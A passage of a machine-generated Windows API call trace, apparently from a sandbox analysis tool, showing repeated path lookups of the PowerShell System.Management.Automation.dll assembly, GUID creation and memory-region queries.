	[0351.652] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccc10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.653] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.653] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.653] CoCreateGuid (in: pguid=0x1cd770 | out: pguid=0x1cd770*(Data1=0x249ae640, Data2=0xc7ff, Data3=0x4a89, Data4=([0]=0x8d, [1]=0x2d, [2]=0x71, [3]=0xdc, [4]=0xa7, [5]=0xfc, [6]=0xac, [7]=0x1a))) returned 0x0
	[0351.653] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccc10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.653] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.653] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.653] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccc10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.653] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.653] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.653] CoCreateGuid (in: pguid=0x1cd770 | out: pguid=0x1cd770*(Data1=0x42567c64, Data2=0x55ab, Data3=0x413e, Data4=([0]=0xad, [1]=0xaf, [2]=0x7a, [3]=0x17, [4]=0x6f, [5]=0x3, [6]=0x1d, [7]=0xeb))) returned 0x0
	[0351.654] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccc10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.654] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.654] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.654] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccc10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.654] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.654] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.654] CoCreateGuid (in: pguid=0x1cd770 | out: pguid=0x1cd770*(Data1=0x3425330d, Data2=0xbc54, Data3=0x4107, Data4=([0]=0xa6, [1]=0x3d, [2]=0x49, [3]=0x22, [4]=0x38, [5]=0x41, [6]=0xd4, [7]=0x56))) returned 0x0
	[0351.654] CoCreateGuid (in: pguid=0x1cd770 | out: pguid=0x1cd770*(Data1=0x59b34b89, Data2=0x8f86, Data3=0x4714, Data4=([0]=0x9c, [1]=0xa, [2]=0xde, [3]=0x87, [4]=0x43, [5]=0x4c, [6]=0xbd, [7]=0x17))) returned 0x0
	[0351.654] CoCreateGuid (in: pguid=0x1cd770 | out: pguid=0x1cd770*(Data1=0x27ac596c, Data2=0x7ec1, Data3=0x4404, Data4=([0]=0x99, [1]=0x14, [2]=0xfd, [3]=0x16, [4]=0x4f, [5]=0x16, [6]=0x21, [7]=0x2c))) returned 0x0
	[0351.655] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccc10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.655] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.655] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.655] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccc10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.655] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.655] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.655] CoCreateGuid (in: pguid=0x1cd770 | out: pguid=0x1cd770*(Data1=0xcab7a3dd, Data2=0x7f20, Data3=0x4819, Data4=([0]=0xab, [1]=0xec, [2]=0x16, [3]=0x3a, [4]=0x7a, [5]=0x66, [6]=0x73, [7]=0xd8))) returned 0x0
	[0351.655] VirtualQuery (in: lpAddress=0x1cb5f0, lpBuffer=0x1cc4b0, dwLength=0x30 | out: lpBuffer=0x1cc4b0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0351.655] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc170, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.656] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc0c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.656] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc0c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.656] VirtualQuery (in: lpAddress=0x1cb5f0, lpBuffer=0x1cc4b0, dwLength=0x30 | out: lpBuffer=0x1cc4b0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0351.656] VirtualQuery (in: lpAddress=0x1cb680, lpBuffer=0x1cc540, dwLength=0x30 | out: lpBuffer=0x1cc540*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0351.656] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbdb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.656] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.656] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.656] VirtualQuery (in: lpAddress=0x1cb5f0, lpBuffer=0x1cc4b0, dwLength=0x30 | out: lpBuffer=0x1cc4b0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0351.656] VirtualQuery (in: lpAddress=0x1cb680, lpBuffer=0x1cc540, dwLength=0x30 | out: lpBuffer=0x1cc540*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0351.656] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbdb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.657] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.657] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.657] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc170, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.657] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc0c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.657] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc0c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.657] VirtualQuery (in: lpAddress=0x1cb5f0, lpBuffer=0x1cc4b0, dwLength=0x30 | out: lpBuffer=0x1cc4b0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0351.657] VirtualQuery (in: lpAddress=0x1cb680, lpBuffer=0x1cc540, dwLength=0x30 | out: lpBuffer=0x1cc540*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0351.657] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbdb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.657] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.657] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.658] VirtualQuery (in: lpAddress=0x1cb5f0, lpBuffer=0x1cc4b0, dwLength=0x30 | out: lpBuffer=0x1cc4b0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0351.658] VirtualQuery (in: lpAddress=0x1cb680, lpBuffer=0x1cc540, dwLength=0x30 | out: lpBuffer=0x1cc540*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0351.658] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc170, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.658] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc0c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.658] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc0c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.658] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc170, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.658] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc0c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.658] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc0c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.658] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc170, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.658] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc0c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.659] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc0c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.659] VirtualQuery (in: lpAddress=0x1cb5f0, lpBuffer=0x1cc4b0, dwLength=0x30 | out: lpBuffer=0x1cc4b0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0351.659] VirtualQuery (in: lpAddress=0x1cb680, lpBuffer=0x1cc540, dwLength=0x30 | out: lpBuffer=0x1cc540*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0351.659] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbdb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.659] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.659] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.659] VirtualQuery (in: lpAddress=0x1cb5f0, lpBuffer=0x1cc4b0, dwLength=0x30 | out: lpBuffer=0x1cc4b0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0351.659] VirtualQuery (in: lpAddress=0x1cb680, lpBuffer=0x1cc540, dwLength=0x30 | out: lpBuffer=0x1cc540*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0351.659] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbdb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.659] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.660] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.660] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cca80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.660] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc9d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
